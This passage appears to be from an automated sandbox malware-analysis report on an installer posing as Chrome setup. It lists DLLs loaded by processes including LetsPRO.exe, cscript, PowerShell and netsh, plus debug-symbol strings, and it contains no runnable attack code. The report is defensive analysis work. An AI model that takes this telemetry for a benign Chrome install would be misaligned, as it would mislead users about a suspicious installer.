                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: schannel.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: propsys.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: edputil.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: appresolver.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: slc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: sppc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: sutup-Chrome.13.26.x64.msi Static file information: File size 16345600 > 1048576
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\MSVCR100.dll
                  Source: Binary string: GoogleUpdateCore_unsigned.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fa.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115530845.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fa.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*L source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .\Device\HarddiskVolume3 Settings\Temp\Symbols\winload_prod.pdb\*.*.*er Data\GraphiteDawnCache\LetsPRO.exeRO.exexeeS/- source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_lt.pdb source: goopdateres_lt.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_el.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112233722.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_mr.pdb source: goopdateres_mr.dll.16.dr
                  Source: Binary string: cation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDB source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_bg.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108636154.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bg.dll.30.dr, goopdateres_bg.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*@ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ar.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108359018.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ar.dll.16.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb@ source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_de.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111761457.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_gu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117478429.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_gu.dll.16.dr
                  Source: Binary string: TEST_mi_exe_stub.pdb source: ChromeSetup.exe, 00000010.00000002.3261124780.0000000000029000.00000002.00000001.01000000.00000005.sdmp, ChromeSetup.exe, 00000010.00000000.2019739468.0000000000029000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2{ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\" source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psmachine_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_es-419.pdb source: GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114195324.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es-419.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sl.pdb source: goopdateres_sl.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_pl.pdb source: goopdateres_pl.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_is.pdb source: GoogleUpdate.exe, 0000001E.00000003.2121928783.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_is.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_th.pdb source: goopdateres_th.dll.30.dr
                  Source: Binary string: GoogleCrashHandler_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_bn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110156700.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bn.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112625418.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ko.pdb source: GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2133014724.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ko.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-TW.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008BF000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ca.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110803785.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, GoogleUpdate.exe, 0000001E.00000002.3261001713.0000000000121000.00000020.00000001.01000000.00000008.sdmp, GoogleUpdate.exe.30.dr, GoogleUpdate.exe.16.dr
                  Source: Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169122915.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateBroker.exe.16.dr, GoogleUpdateBroker.exe.30.dr
                  Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 00000008.00000002.2082649111.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000008.00000000.2016836584.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000002.2085508018.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000000.2017338659.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000002.2085509347.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000000.2017352894.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000000.2017959585.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000002.2081423718.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000002.2179702546.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000000.2021432146.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000000.2030073468.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000002.2096564571.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000002.2101128457.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000000.2028409698.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000002.2090627708.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000000.2028772226.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000000.2028783611.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000002.2090626641.000000000026D000.00000002.00000001.01000000.00000004.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056h& source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_pt-PT.pdb source: goopdateres_pt-PT.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_am.pdb source: GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108069440.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_am.dll.30.dr
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleCrashHandler_unsigned.pdbp source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_cs.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111107544.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_cs.dll.16.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*u source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*sC source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_da.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111407957.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_iw.pdb source: GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127845823.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ja.pdb source: GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2130517355.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psuser_unsigned_64.pdbF source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_et.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115013262.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_et.dll.30.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\LetsPRO.execation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2231954101.0000000000624000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4876bf7-244b-4c34-87a7-98ddf5c5224d}\*.*ecation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exern source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdbR source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ons\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B784 source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118651881.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hr.dll.16.dr
                  Source: Binary string: TEST_psuser_unsigned_64.pdb source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
